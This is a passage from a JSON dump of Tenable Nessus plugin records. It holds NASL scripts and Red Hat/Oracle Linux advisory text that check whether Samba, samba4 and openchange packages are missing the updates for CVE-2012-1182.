(rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba-client-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba-client-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba-client-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"samba-common-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", reference:\"samba-common-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba-swat-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba-swat-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba-swat-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++; }\n\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"libsmbclient-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"libsmbclient-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"libsmbclient-devel-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"libsmbclient-devel-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-client-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-client-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-client-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-common-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-common-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-debuginfo-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-debuginfo-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-doc-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-doc-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-doc-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-domainjoin-gui-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-domainjoin-gui-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-swat-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-swat-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-swat-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-winbind-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-winbind-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-winbind-clients-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-winbind-clients-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-winbind-devel-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-winbind-devel-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-winbind-krb5-locator-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-winbind-krb5-locator-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++; }\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:47:47", "description": "From Red Hat Security Advisory 2013:0515 :\n\nUpdated openchange packages that fix one security issue, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange\nservers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version\nof PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version, including support for the rebased samba4 packages\nand several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee\nand himself as the organizer, a segmentation fault occurred in the\nmemcpy() function. Consequently, the evolution-data-server application\nterminated unexpectedly with a segmentation fault. This bug has been\nfixed and evolution-data-server no longer crashes in the described\nscenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages\nwith a large message body or with extensive attachment. This was\ncaused by minor issues in OpenChange's exchange.idl definitions. This\nbug has been fixed and OpenChange now sends extensive messages without\ncomplications. (BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated\npackages, which fix these issues and add these enhancements.", "edition": 22, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : openchange (ELSA-2013-0515)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:openchange", "p-cpe:/a:oracle:linux:openchange-client", "p-cpe:/a:oracle:linux:openchange-devel-docs", "p-cpe:/a:oracle:linux:evolution-mapi", "p-cpe:/a:oracle:linux:evolution-mapi-devel", "p-cpe:/a:oracle:linux:openchange-devel"], "id": "ORACLELINUX_ELSA-2013-0515.NASL", "href": "https://www.tenable.com/plugins/nessus/68752", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0515 and \n# Oracle Linux Security Advisory ELSA-2013-0515 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68752);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0515\");\n\n script_name(english:\"Oracle Linux 6 : openchange (ELSA-2013-0515)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0515 :\n\nUpdated openchange packages that fix one security issue, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange\nservers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version\nof PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version, including support for the rebased samba4 packages\nand several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee\nand himself as the organizer, a segmentation fault occurred in the\nmemcpy() function. Consequently, the evolution-data-server application\nterminated unexpectedly with a segmentation fault. This bug has been\nfixed and evolution-data-server no longer crashes in the described\nscenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages\nwith a large message body or with extensive attachment. This was\ncaused by minor issues in OpenChange's exchange.idl definitions. This\nbug has been fixed and OpenChange now sends extensive messages without\ncomplications. (BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated\npackages, which fix these issues and add these enhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-February/003302.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openchange packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:evolution-mapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:evolution-mapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-devel-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"evolution-mapi-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"evolution-mapi-devel-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-client-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-devel-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-devel-docs-1.0-4.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"evolution-mapi / evolution-mapi-devel / openchange / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:47:46", "description": "From Red Hat Security Advisory 2013:0506 :\n\nUpdated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. (BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.", "edition": 22, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : samba4 (ELSA-2013-0506)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:samba4-dc", "p-cpe:/a:oracle:linux:samba4-devel", "p-cpe:/a:oracle:linux:samba4-dc-libs", "p-cpe:/a:oracle:linux:samba4-winbind-krb5-locator", "p-cpe:/a:oracle:linux:samba4-swat", "p-cpe:/a:oracle:linux:samba4-client", "p-cpe:/a:oracle:linux:samba4-pidl", "p-cpe:/a:oracle:linux:samba4-winbind-clients", "p-cpe:/a:oracle:linux:samba4-common", "p-cpe:/a:oracle:linux:samba4-winbind", "p-cpe:/a:oracle:linux:samba4-python", "p-cpe:/a:oracle:linux:samba4-test", "p-cpe:/a:oracle:linux:samba4-libs", "p-cpe:/a:oracle:linux:samba4"], "id": "ORACLELINUX_ELSA-2013-0506.NASL", "href": "https://www.tenable.com/plugins/nessus/68746", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0506 and \n# Oracle Linux Security Advisory ELSA-2013-0506 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68746);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0506\");\n\n script_name(english:\"Oracle Linux 6 : samba4 (ELSA-2013-0506)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0506 :\n\nUpdated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. (BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-February/003301.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", 